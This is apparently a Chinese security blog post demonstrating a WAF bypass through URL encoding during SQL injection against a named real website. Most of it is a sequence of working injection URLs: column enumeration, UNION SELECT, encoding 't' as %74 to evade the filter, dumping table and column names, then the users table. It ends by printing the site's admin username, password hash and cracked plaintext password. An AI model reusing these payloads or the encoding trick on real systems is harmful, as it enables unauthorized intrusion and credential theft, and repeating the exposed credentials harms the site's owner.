正在阅读:

WAF绕过方法之URL编码

9,267

实例讲解如何利用URL编码绕过WAF防护

WAF

SQL注入点

http://www.magrabiyemen.com/contents.php?id=3

字段数为4

http://www.magrabiyemen.com/contents.php?id=3 order by 4

显示位为4

http://www.magrabiyemen.com/contents.php?id=3 union select 1,2,3,4

显示基本信息正常

URL编码绕过WAF

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())

暴表的时候出现not acceptable

URL编码绕过WAF

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

尝试绕过,不成功,依然返回上图所示

http://www.magrabiyemen.com/contents.php?id=3 /*!12345UNION*/ /*!12345SELECT*/ 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()

使用URL编码成功绕过(t经过URL编码后为%74)

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()

URL编码绕过WAF

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)

URL编码绕过WAF

http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users

URL编码绕过WAF

admin:ea4ce35c2860112178e8ae2285579919

解密出来为:admin/123456789987654321

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌